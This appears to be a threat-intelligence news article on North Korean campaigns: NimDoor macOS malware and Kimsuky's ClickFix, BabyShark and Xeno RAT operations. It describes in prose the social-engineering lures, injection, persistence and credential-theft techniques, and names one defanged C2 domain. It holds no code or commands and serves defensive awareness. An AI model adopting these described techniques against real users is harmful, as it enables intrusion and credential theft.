Threat actors with ties to North Korea have been observed targeting Web3 and cryptocurrency-related businesses with malware written in the Nim programming language, underscoring a constant evolution of their tactics.
“Unusually for macOS malware, the threat actors employ a process injection technique and remote communications via wss, the TLS-encrypted version of the WebSocket protocol,” SentinelOne researchers Phil Stokes and Raffaele Sabato said in a report shared with The Hacker News.
“A novel persistence mechanism takes advantage of SIGINT/SIGTERM signal handlers to install persistence when the malware is terminated or the system rebooted.”
The cybersecurity company is tracking the malware components collectively under the name NimDoor. It’s worth noting that some aspects of the campaign were previously documented by Huntabil.IT and later by Huntress and Validin, but with differences in the payloads deployed.
The attack chains involve social engineering tactics, approaching targets on messaging platforms like Telegram to schedule a Zoom meeting via Calendly, an appointment scheduling software. The target is then sent an email containing a supposed Zoom meeting link along with instructions to run a Zoom SDK update script to ensure that they are running the latest version of the videoconferencing software.
This step results in the execution of an AppleScript that acts as a delivery vehicle for a second-stage script from a remote server, while ostensibly redirecting the user to a legitimate Zoom redirect link. The newly downloaded script subsequently unpacks ZIP archives containing binaries that are responsible for setting up persistence and launching information stealing bash scripts.
At the heart of the infection sequence is a C++ loader called InjectWithDyldArm64 (aka InjectWithDyld), which decrypts two embedded binaries named Target and trojan1_arm64. InjectWithDyldArm64 launches Target in a suspended state and injects into it the trojan1_arm64’s binary’s code, after which the execution of the suspended process is resumed.
The malware proceeds to establish communication with a remote server and fetch commands that allow it to gather system information, run arbitrary commands, and change or set the current working directory. The results of the execution are sent back to the server.
Trojan1_arm64, for its part, is capable of downloading two more payloads, which come fitted with capabilities to harvest credentials from web browsers like Arc, Brave, Google Chrome, Microsoft Edge, and Mozilla Firefox, as well as extract data from the Telegram application.
Also dropped as part of the attacks is a collection of Nim-based executable that are used as a launchpad for CoreKitAgent, which monitors for user attempts to kill the malware process and ensures persistence.
“This behavior ensures that any user-initiated termination of the malware results in the deployment of the core components, making the code resilient to basic defensive actions,” the researchers said.
The malware also launches an AppleScript that beacons out every 30 seconds to one of two hard-coded command-and-control (C2) servers, while also exfiltrating a snapshot of the list of running processes and executing additional scripts sent by the server.
The findings demonstrate how North Korean threat actors are increasingly training their sights on macOS systems, weaponizing AppleScript to act as a post-exploitation backdoor to meet their data gathering goals.
“North Korean-aligned threat actors have previously experimented with Go and Rust, similarly combining scripts and compiled binaries into multi-stage attack chains,” the researchers said.
“However, Nim’s rather unique ability to execute functions during compile time allows attackers to blend complex behaviour into a binary with less obvious control flow, resulting in compiled binaries in which developer code and Nim runtime code are intermingled even at the function level.”
Kimsuky’s Use of ClickFix Continues
The disclosure comes as South Korean cybersecurity company Genians exposed Kimusky’s continued use of the ClickFix social engineering tactic to deliver a variety of remote access tools as part of a campaign dubbed BabyShark, a known cluster of activity attributed to the North Korean hacking group.
The attacks, first observed in January 2025 and targeting national security experts in South Korea, involve the use of spear-phishing emails masquerading as interview requests for a legitimate German-language business newspaper and trick them into opening a malicious link containing a bogus RAR archive.
Present within the archive is a Visual Basic Script (VBS) file that’s engineered to open a decoy Google Docs file in the user’s web browser, while, in the background, malicious code is executed to establish persistence on the host via scheduled tasks and harvest system information.
Subsequent attacks observed in March 2025 have impersonated a senior U.S. national security official to deceive targets into opening a PDF attachment that included a list of questions related to a meeting during the official’s purported visit to South Korea.
“They also tried to trick the target into opening a manual and entering an authentication code, supposedly required to access a secure document,” Genians said. “While the original ‘ClickFix’ tactic tricked users into clicking to fix a specific error, this variant modified the approach by prompting users to copy and paste an authentication code to access a secure document.”
Once the obfuscated malicious PowerShell command is executed, a decoy Google Docs file is used as a distraction to conceal the execution of malicious code that establishes persistent communication with a C2 server to collect data and deliver additional payloads.
A second variant of the ClickFix strategy entails using a fake website mimicking a legitimate defense research job portal and populating it with bogus listings, causing site visitors who click on these postings to be served with a ClickFix-style pop-up message to open the Windows Run dialog and run a PowerShell command.
The command, for its part, guided users to download and install the Chrome Remote Desktop software on their systems, enabling remote control over SSH via the C2 server “kida.plusdocs.kro[.]kr.” Genians said it discovered a directory listing vulnerability in the C2 server that publicly exposed data likely collected from victims located across South Korea.
The C2 server also included an IP address from China, which has been found to contain a keylogging record for a Proton Drive link hosting a ZIP archive that’s used to drop BabyShark malware on the infected Windows host by means of a multi-stage attack chain.
As recently as last month, Kimsuky is believed to have concocted yet another variant of ClickFix in which the threat actors deploy phony Naver CAPTCHA verification pages to copy and paste PowerShell commands into the Windows Run dialog that launches an AutoIt script to siphon user information.
“The ‘BabyShark’ campaign is known for its swift adoption of new attack techniques, often integrating them with script-based mechanisms,” the company said. “The ‘ClickFix’ tactic discussed in this report appears to be another case of publicly available methods being adapted for malicious use.”
In recent weeks, Kimsuky has also been linked to email phishing campaigns that seemingly originate from academic institutions, but distribute malware under the pretext of reviewing a research paper.
“The email prompted the recipient to open a HWP document file with a malicious OLE object attachment,” AhnLab said. “The document was password-protected, and the recipient had to enter the password provided in the email body to view the document.”
Opening the weaponized document activates the infection process, leading to the execution of a PowerShell script that performs extensive system reconnaissance and the deployment of the legitimate AnyDesk software for persistent remote access.
The prolific threat actor that Kimsuky is, the group is in a constant state of flux regarding its tools, tactics, and techniques for malware delivery, with some of the cyber attacks also leveraging GitHub as a stager for propagating an open-source trojan called Xeno RAT.
“The malware accesses the attacker’s private repositories using a hard-coded Github Personal Access Token (PAT),” ENKI WhiteHat said. “This token was used to download malware from a private repository and upload information collected from victim systems.”
According to the South Korean cybersecurity vendor, the attacks begin with spear-phishing emails with compressed archive attachments containing a Windows shortcut (LNK) file, which, in turn, is likely used to drop a PowerShell script that then downloads and launches the decoy document, as well as executes Xeno RAT and a PowerShell information stealer.
Other attack sequences have been found to utilize a PowerShell-based downloader that fetches a file with an RTF extension from Dropbox to ultimately launch Xeno RAT. The campaign shares infrastructure overlaps with another set of attacks that delivered a variant of Xeno RAT known as MoonPeak.
“The attacker managed not only the malware used in attacks but also uploaded and maintained infected system log files and exfiltrated information in private repositories using GitHub Personal Access Tokens (PATs),” ENKI noted. “This ongoing activity highlights the persistent and evolving nature of Kimsuky’s operations, including their use of both GitHub and Dropbox as part of their infrastructure.”
Kimsuky, per data from NSFOCUS, has been one of the most active threat groups from Korea, alongside Konni, accounting for 5% of all the 44 advanced persistent threat (APT) activities recorded by the Chinese cybersecurity company in May 2025. In comparison, the top three most active APT groups in April were Kimsuky, Sidewinder, and Konni.
